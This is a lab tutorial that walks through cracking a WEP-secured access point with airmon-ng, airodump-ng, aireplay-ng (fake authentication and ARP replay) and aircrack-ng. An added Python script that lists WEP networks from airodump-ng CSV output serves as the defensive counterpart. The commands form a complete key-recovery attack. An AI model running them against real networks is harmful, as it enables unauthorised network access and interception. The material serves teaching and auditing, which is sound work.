Cracking WEP
WEP
--> Wired Equivalent Privacy
--> Uses RC4 (Rivest Cipher 4) and Pre-Shared Key (contains hexadecimal digits)
Deliverable:
Lab Set up
Attacker’s System: Kali Linux
Target: Access Point or Router with WEP security
In Kali Linux --> Terminal
1. To put wlan0 into monitor mode
~# airmon-ng start wlan0
Here, wlan0 --> wireless interface
2. To check available access points
~# airodump-ng mon0
Here, mon0 --> interface for monitor mode
Note down BSSID, Channel number, etc.
3. To capture all the traffic of target access point
~# airodump-ng -c [channel number] --bssid [MAC address of access point] -w [filename] mon0
Here, -c --> channel
[channel number] --> channel number used by access point
--bssid --> Basic Service Set Identification (MAC address of router)
-w --> write to file
[filename] --> name of the file to capture the traffic (capture file)
mon0 --> interface for monitor mode
4. In another terminal --> perform fake authentication
~# aireplay-ng -1 0 -a [MAC address of access point] mon0
Here, -1 --> attack mode used for fake authentication
0 --> reassociation delay, in seconds
-a --> BSSID of target (MAC address of router)
mon0 --> interface for monitor mode
5. To speed up data collection after association, we can use ARP request replay
~# aireplay-ng -3 -b [MAC address of access point] mon0
Here, -3 --> attack mode for ARP request replay attack
-b --> BSSID of target (MAC address of router)
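6. In the previous terminal (running airodump-ng) --> when the Data count reaches 50,000 to 250,000, we can stop the capture. The capture file should now exist in the directory where airodump-ng was started (here, root's home directory).
7. Now you can crack the key from the capture file (airodump-ng appends -01.cap to the name given with -w)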
~# aircrack-ng [filename-01.cap]
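A defender's counterpart to the survey in step 2, as an added example that is not part of the original notes: it reads the CSV file that airodump-ng writes next to the capture when -w is used and lists access points still advertising WEP, together with the clients seen on each. The sample data, MAC addresses and function names are constructed for illustration.

```python
import csv
import io

# Constructed sample in the layout of airodump-ng's CSV output:
# an access-point table, a blank line, then a station table.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
02:00:00:AA:BB:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WEP, WEP,   , -40,  120,  5321,   0.  0.  0.  0,   7, lab-wep,
02:00:00:AA:BB:02, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11,  54, WPA2, CCMP, PSK, -55,  300,  0,   0.  0.  0.  0,   8, lab-wpa2,
02:00:00:AA:BB:03, 2024-01-01 10:00:01, 2024-01-01 10:05:00,  1,  54, WPA2 WPA, CCMP TKIP, PSK, -60,  90,  0,   0.  0.  0.  0,   9, lab-mixed,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
02:00:00:CC:DD:01, 2024-01-01 10:00:05, 2024-01-01 10:04:59, -45,  812, 02:00:00:AA:BB:01,
02:00:00:CC:DD:02, 2024-01-01 10:00:07, 2024-01-01 10:04:50, -70,  14, (not associated), lab-wep
"""

def parse_tables(text):
    """Split airodump-ng CSV text into its tables; each is a list of dict rows."""
    tables, header = [], None
    for fields in csv.reader(io.StringIO(text)):
        fields = [f.strip() for f in fields]   # the tool pads fields with spaces
        if not any(fields):                    # blank line ends the current table
            header = None
            continue
        if header is None:                     # first non-blank line is a header
            header = fields
            tables.append([])
        else:
            tables[-1].append(dict(zip(header, fields)))
    return tables

def find_wep_networks(text):
    """Return access points advertising WEP and the stations associated to each."""
    tables = parse_tables(text)
    aps = tables[0] if tables else []
    stations = tables[1] if len(tables) > 1 else []
    findings = []
    for ap in aps:
        if "WEP" not in ap.get("Privacy", "").split():
            continue                           # WPA/WPA2 rows are not reported
        clients = sorted(s["Station MAC"] for s in stations
                         if s.get("BSSID") == ap["BSSID"])
        findings.append({"bssid": ap["BSSID"], "essid": ap["ESSID"],
                         "channel": int(ap["channel"]), "clients": clients})
    return findings

if __name__ == "__main__":
    for f in find_wep_networks(SAMPLE_CSV):
        print(f"WEP in use: {f['essid']} ({f['bssid']}) ch {f['channel']}, clients: {f['clients']}")
```

Any access point this reports should be moved to WPA2 or WPA3, since the steps above recover a WEP key regardless of how it was chosen.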